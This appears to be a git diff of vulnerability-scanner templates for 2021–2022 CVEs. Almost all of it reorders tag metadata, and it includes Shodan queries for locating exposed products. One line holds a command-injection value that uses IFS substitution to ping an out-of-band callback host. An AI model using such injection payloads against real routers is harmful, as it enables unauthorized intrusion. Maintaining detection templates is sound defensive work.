shodan-query: http.html:"kkFileView"
- tags: cve,cve2021,kkfileview,traversal,lfi,keking
+ tags: cve2021,cve,kkfileview,traversal,lfi,keking
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml
index 65af477984..f3c53c3703 100644
--- a/http/cves/2021/CVE-2021-43778.yaml
+++ b/http/cves/2021/CVE-2021-43778.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: glpi-project
product: barcode
- tags: glpi,cve,cve2021,lfi,plugin,traversal,glpi-project
+ tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml
index 720152f189..d5cc9f6ddc 100644
--- a/http/cves/2021/CVE-2021-43798.yaml
+++ b/http/cves/2021/CVE-2021-43798.yaml
@@ -28,7 +28,7 @@ info:
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
- tags: packetstorm,cve,cve2021,grafana,lfi
+ tags: cve2021,cve,packetstorm,grafana,lfi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml
index f0bb254ed9..95ab2c9978 100644
--- a/http/cves/2021/CVE-2021-43810.yaml
+++ b/http/cves/2021/CVE-2021-43810.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: admidio
product: admidio
- tags: cve,cve2021,admidio,xss
+ tags: cve2021,cve,admidio,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml
index d91af0d730..9200356fa1 100644
--- a/http/cves/2021/CVE-2021-44077.yaml
+++ b/http/cves/2021/CVE-2021-44077.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: zohocorp
product: manageengine_servicedesk_plus
- tags: rce,kev,msf,cve,cve2021,zoho,manageengine,zohocorp
+ tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml
index bc5e751b3e..2fd9696fdb 100644
--- a/http/cves/2021/CVE-2021-44138.yaml
+++ b/http/cves/2021/CVE-2021-44138.yaml
@@ -27,7 +27,7 @@ info:
vendor: caucho
product: resin
shodan-query: html:"Resin"
- tags: cve,cve2021,resin,caucho,lfi
+ tags: cve2021,cve,resin,caucho,lfi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml
index 3bdbb94200..da59cfb411 100644
--- a/http/cves/2021/CVE-2021-44139.yaml
+++ b/http/cves/2021/CVE-2021-44139.yaml
@@ -25,7 +25,7 @@ info:
vendor: hashicorp
product: sentinel
shodan-query: title:"Sentinel Dashboard"
- tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel,hashicorp
+ tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml
index 62b0b76d2f..151006a3b6 100644
--- a/http/cves/2021/CVE-2021-44152.yaml
+++ b/http/cves/2021/CVE-2021-44152.yaml
@@ -30,7 +30,7 @@ info:
product: reprise_license_manager
shodan-query: http.html:"Reprise License Manager"
google-query: inurl:"/goforms/menu"
- tags: cve,packetstorm,cve2021,rlm,auth-bypass,reprisesoftware
+ tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml
index 75fa544168..6d00623db1 100644
--- a/http/cves/2021/CVE-2021-44228.yaml
+++ b/http/cves/2021/CVE-2021-44228.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: apache
product: log4j
- tags: cve,cve2021,rce,oast,log4j,injection,kev,apache
+ tags: cve2021,cve,rce,oast,log4j,injection,kev,apache
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml
index a34a540292..2e9595cbc1 100644
--- a/http/cves/2021/CVE-2021-44451.yaml
+++ b/http/cves/2021/CVE-2021-44451.yaml
@@ -27,7 +27,7 @@ info:
vendor: apache
product: superset
shodan-query: http.favicon.hash:1582430156
- tags: cve,cve2021,apache,superset,default-login
+ tags: cve2021,cve,apache,superset,default-login
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml
index e45d67afda..00f294892a 100644
--- a/http/cves/2021/CVE-2021-44515.yaml
+++ b/http/cves/2021/CVE-2021-44515.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: zohocorp
product: manageengine_desktop_central
- tags: cve,cve2021,zoho,rce,manageengine,kev,zohocorp
+ tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml
index d56435f7ff..7e23acccd7 100644
--- a/http/cves/2021/CVE-2021-44528.yaml
+++ b/http/cves/2021/CVE-2021-44528.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: rubyonrails
product: rails
- tags: seclists,cve,cve2021,redirect,rubyonrails
+ tags: cve2021,cve,seclists,redirect,rubyonrails
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml
index 13f65a8825..b9f8f30094 100644
--- a/http/cves/2021/CVE-2021-44529.yaml
+++ b/http/cves/2021/CVE-2021-44529.yaml
@@ -27,7 +27,7 @@ info:
vendor: ivanti
product: endpoint_manager_cloud_services_appliance
shodan-query: title:"LANDesk(R) Cloud Services Appliance"
- tags: cve2021,ivanti,epm,csa,injection,packetstorm,cve
+ tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml
index 32c8df3d64..5599d9009e 100644
--- a/http/cves/2021/CVE-2021-44848.yaml
+++ b/http/cves/2021/CVE-2021-44848.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: cybelesoft
product: thinfinity_virtualui
- tags: cve,cve2021,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft
+ tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-44910.yaml b/http/cves/2021/CVE-2021-44910.yaml
index abb65c2e0f..373373f00b 100644
--- a/http/cves/2021/CVE-2021-44910.yaml
+++ b/http/cves/2021/CVE-2021-44910.yaml
@@ -8,7 +8,7 @@ info:
SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs.
reference:
- https://github.com/chillzhuang/blade-tool
- tags: cve,cve2023,springblade,blade,info-leak
+ tags: cve2021,cve,springblade,blade,info-leak
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml
index ab1ee0cadc..296d8764c3 100644
--- a/http/cves/2021/CVE-2021-45043.yaml
+++ b/http/cves/2021/CVE-2021-45043.yaml
@@ -27,7 +27,7 @@ info:
vendor: hd-network_real-time_monitoring_system_project
product: hd-network_real-time_monitoring_system
google-query: intitle:"HD-Network Real-time Monitoring System V2.0"
- tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project
+ tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml
index 537402d0ec..fa4d8b863c 100644
--- a/http/cves/2021/CVE-2021-45046.yaml
+++ b/http/cves/2021/CVE-2021-45046.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: log4j
- tags: cve,cve2021,rce,oast,log4j,injection,kev,apache
+ tags: cve2021,cve,rce,oast,log4j,injection,kev,apache
http:
- raw:
- |
diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml
index 9b9512b48e..52d2a20a34 100644
--- a/http/cves/2021/CVE-2021-45092.yaml
+++ b/http/cves/2021/CVE-2021-45092.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: cybelesoft
product: thinfinity_virtualui
- tags: packetstorm,iframe,thinfinity,tenable,cve,cve2021,injection,cybelesoft
+ tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml
index 74f3aa4f23..c5657db284 100644
--- a/http/cves/2021/CVE-2021-45232.yaml
+++ b/http/cves/2021/CVE-2021-45232.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: apisix_dashboard
- tags: cve,cve2021,apache,unauth,apisix
+ tags: cve2021,cve,apache,unauth,apisix
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml
index 8f8b469078..14700733e0 100644
--- a/http/cves/2021/CVE-2021-45380.yaml
+++ b/http/cves/2021/CVE-2021-45380.yaml
@@ -25,7 +25,7 @@ info:
vendor: appcms
product: appcms
shodan-query: http.html:"Powerd by AppCMS"
- tags: cve,cve2021,appcms,xss
+ tags: cve2021,cve,appcms,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-45382.yaml b/http/cves/2021/CVE-2021-45382.yaml
index 0d7e7cd17e..0b9f7c70b8 100644
--- a/http/cves/2021/CVE-2021-45382.yaml
+++ b/http/cves/2021/CVE-2021-45382.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: dlink
product: dir-820l_firmware
- tags: cve,cve2021,dlink,kev,rce
+ tags: cve2021,cve,dlink,kev,rce
variables:
string1: "{{to_lower(rand_base(5))}}"
string2: "{{to_lower(rand_base(6))}}"
diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml
index 56df76c3c0..67ba9bba5a 100644
--- a/http/cves/2021/CVE-2021-45422.yaml
+++ b/http/cves/2021/CVE-2021-45422.yaml
@@ -29,7 +29,7 @@ info:
vendor: reprisesoftware
product: reprise_license_manager
shodan-query: http.html:"Reprise License"
- tags: cve,cve2021,reprise,xss,seclists,reprisesoftware
+ tags: cve2021,cve,reprise,xss,seclists,reprisesoftware
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml
index 7047ec383f..ae965b0884 100644
--- a/http/cves/2021/CVE-2021-45428.yaml
+++ b/http/cves/2021/CVE-2021-45428.yaml
@@ -28,7 +28,7 @@ info:
vendor: telesquare
product: tlr-2005ksh_firmware
shodan-query: http.html:"TLR-2005KSH"
- tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm
+ tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml
index 08b5567458..6298ccf7cd 100644
--- a/http/cves/2021/CVE-2021-45968.yaml
+++ b/http/cves/2021/CVE-2021-45968.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: jivesoftware
product: jive
- tags: cve,cve2021,pascom,lfi,jivesoftware
+ tags: cve2021,cve,pascom,lfi,jivesoftware
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml
index 785b44ce20..bd3f1ae51e 100644
--- a/http/cves/2021/CVE-2021-46005.yaml
+++ b/http/cves/2021/CVE-2021-46005.yaml
@@ -25,7 +25,7 @@ info:
max-request: 3
vendor: car_rental_management_system_project
product: car_rental_management_system
- tags: sourcecodester,authenticated,edb,cve,cve2021,xss,intrusive,car_rental_management_system_project
+ tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml
index 621884fc2f..102754f59f 100644
--- a/http/cves/2021/CVE-2021-46068.yaml
+++ b/http/cves/2021/CVE-2021-46068.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
- tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project
+ tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml
index cde09f75c2..66ae5dbbad 100644
--- a/http/cves/2021/CVE-2021-46071.yaml
+++ b/http/cves/2021/CVE-2021-46071.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
- tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project
+ tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml
index e38ccfa7eb..d76c101057 100644
--- a/http/cves/2021/CVE-2021-46072.yaml
+++ b/http/cves/2021/CVE-2021-46072.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
- tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project
+ tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml
index 0555f15927..b8181e5c3e 100644
--- a/http/cves/2021/CVE-2021-46073.yaml
+++ b/http/cves/2021/CVE-2021-46073.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
- tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project
+ tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml
index b72dcbed17..8735401ce9 100644
--- a/http/cves/2021/CVE-2021-46107.yaml
+++ b/http/cves/2021/CVE-2021-46107.yaml
@@ -29,7 +29,7 @@ info:
product: ligeo_basics
shodan-query: title:"Ligeo"
fofa-query: title="Ligeo"
- tags: cve,cve2021,ligeo,ssrf,lfr,ligeo-archives
+ tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml
index b8ea4ff65f..98445d68b1 100644
--- a/http/cves/2021/CVE-2021-46381.yaml
+++ b/http/cves/2021/CVE-2021-46381.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: dlink
product: dap-1620_firmware
- tags: lfi,router,packetstorm,cve,cve2021,dlink
+ tags: cve2021,cve,lfi,router,packetstorm,dlink
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml
index de652fe759..52c4fc610e 100644
--- a/http/cves/2021/CVE-2021-46387.yaml
+++ b/http/cves/2021/CVE-2021-46387.yaml
@@ -28,7 +28,7 @@ info:
vendor: zyxel
product: zywall_2_plus_internet_security_appliance_firmware
shodan-query: http.title:"Zywall2Plus"
- tags: cve,cve2021,xss,zyxel,edb
+ tags: cve2021,cve,xss,zyxel,edb
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml
index 911ef91c61..fbd7157deb 100644
--- a/http/cves/2021/CVE-2021-46417.yaml
+++ b/http/cves/2021/CVE-2021-46417.yaml
@@ -29,7 +29,7 @@ info:
vendor: franklinfueling
product: colibri_firmware
shodan-query: http.html:"Franklin Fueling Systems"
- tags: packetstorm,cve,cve2021,franklinfueling,lfi
+ tags: cve2021,cve,packetstorm,franklinfueling,lfi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml
index 2c26d97401..3f77ed5e8d 100644
--- a/http/cves/2021/CVE-2021-46422.yaml
+++ b/http/cves/2021/CVE-2021-46422.yaml
@@ -30,7 +30,7 @@ info:
vendor: telesquare
product: sdt-cs3b1_firmware
shodan-query: html:"SDT-CW3B1"
- tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb
+ tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb
variables:
cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"
diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml
index a70cb01db2..3e7c4da141 100644
--- a/http/cves/2021/CVE-2021-46424.yaml
+++ b/http/cves/2021/CVE-2021-46424.yaml
@@ -28,7 +28,7 @@ info:
vendor: telesquare
product: tlr-2005ksh_firmware
shodan-query: http.html:"TLR-2005KSH"
- tags: cve,cve2021,telesquare,intrusive,packetstorm
+ tags: cve2021,cve,telesquare,intrusive,packetstorm
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml
index c3fefa7f23..f95eb57ab4 100644
--- a/http/cves/2021/CVE-2021-46704.yaml
+++ b/http/cves/2021/CVE-2021-46704.yaml
@@ -30,7 +30,7 @@ info:
vendor: genieacs
product: genieacs
shodan-query: http.favicon.hash:-2098066288
- tags: cve,cve2021,genieacs,rce
+ tags: cve2021,cve,genieacs,rce
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml
index 4ad76d5375..44d96cdfa1 100644
--- a/http/cves/2022/CVE-2022-0087.yaml
+++ b/http/cves/2022/CVE-2022-0087.yaml
@@ -16,7 +16,7 @@ info:
vendor: keystonejs
product: keystone
framework: node.js
- tags: cve,cve2022,keystone,redirect,xss
+ tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml
index 9b7da91a37..5e8073a2a8 100644
--- a/http/cves/2022/CVE-2022-0140.yaml
+++ b/http/cves/2022/CVE-2022-0140.yaml
@@ -27,7 +27,7 @@ info:
vendor: vfbpro
product: visual_form_builder
framework: wordpress
- tags: wpscan,cve,cve2022,xss,wordpress,vfbpro
+ tags: cve,cve2022,wpscan,xss,wordpress,vfbpro
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml
index a163b95d95..29d3a73369 100644
--- a/http/cves/2022/CVE-2022-0147.yaml
+++ b/http/cves/2022/CVE-2022-0147.yaml
@@ -29,7 +29,7 @@ info:
vendor: cookieinformation
product: wp-gdpr-compliance
framework: wordpress
- tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation
+ tags: cve2022,cve,wordpress,xss,wp,authenticated,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml
index d243bf4c73..ea72ddbc93 100644
--- a/http/cves/2022/CVE-2022-0148.yaml
+++ b/http/cves/2022/CVE-2022-0148.yaml
@@ -27,7 +27,7 @@ info:
vendor: premio
product: mystickyelements
framework: wordpress
- tags: xss,wp-plugin,authenticated,wpscan,cve,cve2022,wordpress,premio
+ tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml
index b0ab05e2d3..4fd4ed123f 100644
--- a/http/cves/2022/CVE-2022-0149.yaml
+++ b/http/cves/2022/CVE-2022-0149.yaml
@@ -26,7 +26,7 @@ info:
vendor: visser
product: store_exporter_for_woocommerce
framework: wordpress
- tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated,visser
+ tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml
index 7966869e6f..df6405cd69 100644
--- a/http/cves/2022/CVE-2022-0150.yaml
+++ b/http/cves/2022/CVE-2022-0150.yaml
@@ -26,7 +26,7 @@ info:
vendor: wp_accessibility_helper_project
product: wp_accessibility_helper
framework: wordpress
- tags: wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss,wp_accessibility_helper_project
+ tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,xss,wp_accessibility_helper_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml
index 0065f55318..e62497a95d 100644
--- a/http/cves/2022/CVE-2022-0169.yaml
+++ b/http/cves/2022/CVE-2022-0169.yaml
@@ -29,7 +29,7 @@ info:
product: photo_gallery
framework: wordpress
publicwww-query: "/wp-content/plugins/photo-gallery"
- tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery,10web
+ tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web
variables:
num: "999999999"
diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml
index bd2e59137e..d73675c1fb 100644
--- a/http/cves/2022/CVE-2022-0189.yaml
+++ b/http/cves/2022/CVE-2022-0189.yaml
@@ -26,7 +26,7 @@ info:
vendor: wprssaggregator
product: wp_rss_aggregator
framework: wordpress
- tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated,wprssaggregator
+ tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml
index 6bd6d91628..e3e40c5459 100644
--- a/http/cves/2022/CVE-2022-0201.yaml
+++ b/http/cves/2022/CVE-2022-0201.yaml
@@ -26,7 +26,7 @@ info:
vendor: permalink_manager_lite_project
product: permalink_manager_lite
framework: wordpress
- tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress,permalink_manager_lite_project
+ tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml
index 528330ec2c..549b58e36c 100644
--- a/http/cves/2022/CVE-2022-0206.yaml
+++ b/http/cves/2022/CVE-2022-0206.yaml
@@ -27,7 +27,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
- tags: xss,wp,authenticated,cve2022,wordpress,wp-plugin,newstatpress,wpscan,cve,newstatpress_project
+ tags: cve,cve2022,xss,wp,authenticated,wordpress,wp-plugin,newstatpress,wpscan,newstatpress_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml
index 4adbefebf5..a51730a54b 100644
--- a/http/cves/2022/CVE-2022-0208.yaml
+++ b/http/cves/2022/CVE-2022-0208.yaml
@@ -26,7 +26,7 @@ info:
vendor: mappresspro
product: mappress
framework: wordpress
- tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve,mappresspro
+ tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml
index e5262830b6..597d016033 100644
--- a/http/cves/2022/CVE-2022-0212.yaml
+++ b/http/cves/2022/CVE-2022-0212.yaml
@@ -28,7 +28,7 @@ info:
vendor: 10web
product: spidercalendar
framework: wordpress
- tags: cve,cve2022,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated,10web
+ tags: cve2022,cve,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated,10web
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml
index 028fa3ad8a..56f782d977 100644
--- a/http/cves/2022/CVE-2022-0218.yaml
+++ b/http/cves/2022/CVE-2022-0218.yaml
@@ -27,7 +27,7 @@ info:
vendor: codemiq
product: wordpress_email_template_designer
framework: wordpress
- tags: wordpress,wp-plugin,xss,cve,cve2022,codemiq
+ tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml
index 4a20579f8d..dfe0bc2a0d 100644
--- a/http/cves/2022/CVE-2022-0220.yaml
+++ b/http/cves/2022/CVE-2022-0220.yaml
@@ -25,7 +25,7 @@ info:
vendor: welaunch
product: wordpress_gdpr\&ccpa
framework: wordpress
- tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,unauth,welaunch
+ tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml
index 0520ae68d9..fe76bb684c 100644
--- a/http/cves/2022/CVE-2022-0228.yaml
+++ b/http/cves/2022/CVE-2022-0228.yaml
@@ -26,7 +26,7 @@ info:
product: popup_builder
framework: wordpress
publicwww-query: /wp-content/plugins/popup-builder/
- tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos
+ tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml
index a1aad89cbb..618d791fcf 100644
--- a/http/cves/2022/CVE-2022-0234.yaml
+++ b/http/cves/2022/CVE-2022-0234.yaml
@@ -30,7 +30,7 @@ info:
product: woocs
framework: wordpress
google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher"
- tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs,pluginus
+ tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,woocs,pluginus
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml
index 3923274547..694e45b5c1 100644
--- a/http/cves/2022/CVE-2022-0271.yaml
+++ b/http/cves/2022/CVE-2022-0271.yaml
@@ -27,7 +27,7 @@ info:
vendor: thimpress
product: learnpress
framework: wordpress
- tags: wp,wp-plugin,wordpress,cve,cve2022,learnpress,wpscan,xss,thimpress
+ tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml
index 46fb756868..febc98b6a7 100644
--- a/http/cves/2022/CVE-2022-0288.yaml
+++ b/http/cves/2022/CVE-2022-0288.yaml
@@ -25,7 +25,7 @@ info:
vendor: ad_inserter_pro_project
product: ad_inserter_pro
framework: wordpress
- tags: wordpress,xss,wpscan,cve,cve2022,ad_inserter_pro_project
+ tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project
http:
- method: POST
diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml
index 76953b11a3..451c52024a 100644
--- a/http/cves/2022/CVE-2022-0342.yaml
+++ b/http/cves/2022/CVE-2022-0342.yaml
@@ -24,7 +24,7 @@ info:
vendor: zyxel
product: usg40_firmware
fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1"
- tags: cve,cve2022,zyxel,auth-bypass,router
+ tags: cve2022,cve,zyxel,auth-bypass,router
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml
index 833adb9f4c..f1279f023b 100644
--- a/http/cves/2022/CVE-2022-0346.yaml
+++ b/http/cves/2022/CVE-2022-0346.yaml
@@ -28,7 +28,7 @@ info:
vendor: xmlsitemapgenerator
product: xml_sitemap_generator
framework: wordpress
- tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator
+ tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml
index bd3cb56508..63acecf6a7 100644
--- a/http/cves/2022/CVE-2022-0349.yaml
+++ b/http/cves/2022/CVE-2022-0349.yaml
@@ -28,7 +28,7 @@ info:
vendor: wpdeveloper
product: notificationx
framework: wordpress
- tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve,wpdeveloper
+ tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml
index dd221379d4..27c43785f9 100644
--- a/http/cves/2022/CVE-2022-0378.yaml
+++ b/http/cves/2022/CVE-2022-0378.yaml
@@ -26,7 +26,7 @@ info:
vendor: microweber
product: microweber
